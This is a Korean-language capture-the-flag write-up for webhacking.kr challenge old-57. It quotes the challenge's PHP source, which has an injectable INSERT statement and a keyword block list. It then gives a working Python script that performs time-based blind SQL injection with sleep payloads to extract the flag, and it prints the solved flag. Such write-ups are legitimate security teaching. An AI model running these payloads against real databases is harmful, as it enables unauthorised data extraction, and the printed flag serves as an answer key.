old-57 (600)
첫 화면이다.
view-source를 클릭해 본 소스는 아래와 같다.
<?php
include "../../config.php";
include "./flag.php";
if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?php
$db = dbconnect();
if($_GET['msg'] && isset($_GET['se'])){
$_GET['msg'] = addslashes($_GET['msg']);
$_GET['se'] = addslashes($_GET['se']);
if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
echo "Done<br><br>";
if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
}
?>
<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>
<br><br><a href=./?view_source=1>view-source</a>
</body>
</html>폼에 abc 를 넣고 제출하면 아래와 같이 나타난다.
출력 값이 고정이므로 Time-based Blind SQL Injection으로 인식하였다.
파이썬 코드를 짜면 아래와 같다.
import requests
import time
URL = 'https://webhacking.kr/challenge/web-34/index.php?msg=abc&se='
SLEEP = 10
def query(payload):
start = time.time()
requests.get(URL + payload)
if time.time() - start > SLEEP:
return True
else:
return False
# 24
def find_flag_length():
flag_len = 1
while query('if(length(pw)={},sleep({}),1)'.format(flag_len, SLEEP)) is False:
flag_len += 1
print('flag_len: {}'.format(flag_len))
return flag_len
# FLAG{y2u.be/kmPgjr0EL64}
def find_flag():
flag_len = 24
flag = ''
for pos in range(1, flag_len + 1):
for character in range(0, 128):
if query('if(ascii(substr(pw,{},1))={},sleep({}),1)'.format(pos, character, SLEEP)) is True:
flag += chr(character)
break
print('flag: {}'.format(flag))
find_flag()실행 결과, 플래그는 FLAG{y2u.be/kmPgjr0EL64}이다.
Auth 창에 플래그를 넣고 제출하면 문제가 풀린다.
Last updated
Was this helpful?